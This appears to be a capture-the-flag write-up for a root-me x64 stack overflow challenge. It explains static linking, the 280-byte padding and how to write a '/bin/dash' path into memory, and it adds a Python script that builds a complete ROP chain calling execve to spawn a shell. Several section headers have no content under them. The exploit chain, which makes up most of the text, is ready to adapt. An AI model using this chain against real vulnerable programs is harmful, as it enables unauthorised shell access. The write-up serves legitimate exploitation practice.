root-me:x64 stack overflow advanced

x64 stack overflow advanced

general

Its compile options:
gcc -o ch34 ch34.c -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static
(so: no stack canary, full RELRO, non-executable stack, statically linked and therefore not PIE)

The usual exploit method:

  • leak the address of a function the program uses
  • compute the offset with libc.so to get the addresses of system and the "/bin/sh" string
  • ret2libc (when NX is enabled) or write shellcode (when the stack is executable)

Computing the real address:

But this program was compiled with -static, so every function address is fixed: there is no PLT/GOT to leak and no libc offset to compute. Libc is linked into the binary, so the gadgets we need are already there at known addresses.

Steps

checksec:

According to the above analysis we can use ROP gadgets:

Get a universal ROP chain:

Calculate the padding length:

So the padding length is 280.

Another thing worth mentioning: on my machine /bin/sh is a symbolic link to /bin/dash, but on the practice machine it is not, so I need to edit the ROP chain to run execve("/bin/dash", NULL, NULL) instead of execve("/bin/sh", NULL, NULL).

Let's look at it here:

  • the extra / in the string /bin//sh at line 4 pads the path to exactly 8 bytes, so it can be written to memory with a single qword store (the kernel ignores repeated slashes); //bin/sh produces the same effect
  • the terminating \0 is written at lines 7-9

So we can split ////////bin/dash into two 8-byte parts, //////// and bin/dash, write them one after the other with the same store gadget, and then write the terminating qword of zeros.
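The following script is an added example, not the writeup's own exploit. It implements the procedure above in one place: a cyclic pattern to measure the padding, the split of a path into 8-byte qwords (generalised so that any path works, not just /bin/dash), and the chain that stores the string into writable memory and calls execve via syscall. The gadget addresses and DATA_ADDR are placeholders: take the real ones from the chain ROPgadget prints for ch34. It also assumes the program reads the input with read(), so null bytes in the chain are acceptable (ROPgadget's own chain has them in every address anyway).

```python
#!/usr/bin/env python3
"""Build the ROP payload for a statically linked, non-PIE x64 binary (added example)."""
import struct
import sys
from string import ascii_lowercase, ascii_uppercase, digits

PADDING = 280            # measured offset from buffer start to saved return address
DATA_ADDR = 0x6B0000     # ASSUMED: a writable address in .data; use the one ROPgadget chose
SYS_EXECVE = 59          # execve syscall number on x86-64

# ASSUMED placeholder gadget addresses: substitute the ones ROPgadget prints for ch34.
GADGETS = {
    "pop_rsi":     0x400001,  # pop rsi ; ret
    "pop_rax":     0x400002,  # pop rax ; ret
    "mov_rsi_rax": 0x400003,  # mov qword ptr [rsi], rax ; ret
    "pop_rdi":     0x400004,  # pop rdi ; ret
    "pop_rdx":     0x400005,  # pop rdx ; ret
    "syscall":     0x400006,  # syscall
}


def p64(value):
    """Pack a 64-bit little-endian word."""
    return struct.pack("<Q", value)


def cyclic(n):
    """Metasploit-style pattern: every 3-byte chunk 'Aa0'..'Zz9' is unique,
    so any 8-byte window is unique for n <= 20280."""
    out = bytearray()
    for a in ascii_uppercase:
        for b in ascii_lowercase:
            for c in digits:
                out += (a + b + c).encode()
                if len(out) >= n:
                    return bytes(out[:n])
    raise ValueError("pattern too long")


def find_offset(n, qword_on_stack):
    """Offset of the saved return address, given the qword sitting at [rsp]
    when the program crashes after being fed cyclic(n). (On x86-64 a
    non-canonical address never reaches RIP, so read the value from RSP.)"""
    return cyclic(n).find(p64(qword_on_stack))


def string_qwords(path):
    """Left-pad path with '/' to a multiple of 8 bytes (extra leading slashes
    do not change the path), split it into 8-byte chunks, append a NUL qword."""
    padded = b"/" * ((-len(path)) % 8) + path
    chunks = [padded[i:i + 8] for i in range(0, len(padded), 8)]
    return chunks + [b"\x00" * 8]


def build_chain(path, g=GADGETS, data=DATA_ADDR):
    """Write path into .data one qword at a time, then execve(path, NULL, NULL)."""
    chain = b""
    for i, chunk in enumerate(string_qwords(path)):
        chain += p64(g["pop_rsi"]) + p64(data + 8 * i)   # rsi = destination
        chain += p64(g["pop_rax"]) + chunk               # rax = 8 bytes of the string
        chain += p64(g["mov_rsi_rax"])                   # [rsi] = rax
    chain += p64(g["pop_rdi"]) + p64(data)               # rdi = pathname
    chain += p64(g["pop_rsi"]) + p64(0)                  # rsi = argv = NULL
    chain += p64(g["pop_rdx"]) + p64(0)                  # rdx = envp = NULL
    chain += p64(g["pop_rax"]) + p64(SYS_EXECVE)         # rax = 59
    chain += p64(g["syscall"])
    return chain


def build_payload(path=b"/bin/dash"):
    """Padding up to the saved return address, then the chain."""
    return b"A" * PADDING + build_chain(path)


if __name__ == "__main__":
    sys.stdout.buffer.write(build_payload())
```

Run it as `python3 exploit.py | ./ch34` after replacing the placeholder addresses; to measure the padding first, feed `cyclic(400)` to the program under gdb and pass the qword at [rsp] to find_offset.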

Exploit

Run it:
